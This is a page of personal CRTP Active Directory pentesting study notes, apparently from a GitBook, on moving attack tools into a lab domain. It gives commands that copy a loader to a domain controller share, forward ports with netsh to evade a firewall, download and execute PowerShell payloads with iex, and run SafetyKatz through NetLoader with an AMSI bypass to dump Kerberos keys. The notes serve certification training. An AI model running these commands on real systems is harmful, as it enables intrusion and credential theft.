🛠️
CRTP Notes
  • 🛠️CRTP Notes
  • ⚙️CRTP Methodology
  • 💡Misc
    • PowerShell Basics
    • Bypass defenses
    • Transfer files
  • 🔨Basic enumeration
    • General
    • Network
    • Protection
  • ⛏️AD Enumeration
    • Gnereral
    • ACL
    • Forests and Trusts
  • 🔪Privilege Escalation
    • Local Privilege Escalation
    • Domain Privilege Escalation
      • Kerberoast
      • AS-REP Roasting
      • Delegations
    • Cross Domain Privilege Escalation
      • Trusts
      • AD CS
      • MSSQL Servers
  • 🏎️Lateral Movement
    • WinRM
    • Credentials Dumping
    • DC Sync
    • Over Pass The Hash
    • Runas
  • 🔧Persistence
    • Kerberos
      • Golden Ticket
      • Silver Ticket
      • Diamond Ticket
    • Skeleton Key
    • DSRM
    • Custom SSP
    • AdminSDHolder
    • Security Descriptors
    • ACL
  • 🛡️Mitigations
  • 📚Resources
    • AD attacking overall
    • Rubeus Guide
    • The Hacker Recipes
Powered by GitBook
On this page
  • Shares
  • HTTP Server

Was this helpful?

  1. Misc

Transfer files

Last updated 6 months ago

Was this helpful?

Shares

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

HTTP Server

  1. Port forward to avoid firewall using netsh on target machine

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=127.0.0.1 connectport=80 connectaddress=172.16.100.x

  1. Serve the files using or http simple server

python3 -m http.server -port 80

  1. Download the file on target machine

# Download and store
(new-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/<File>', '<Dest Path>')

# Download and execute
iex ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/<File>'));

# NetLoader to execute and bypass amsi
NetLoader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

💡
hfs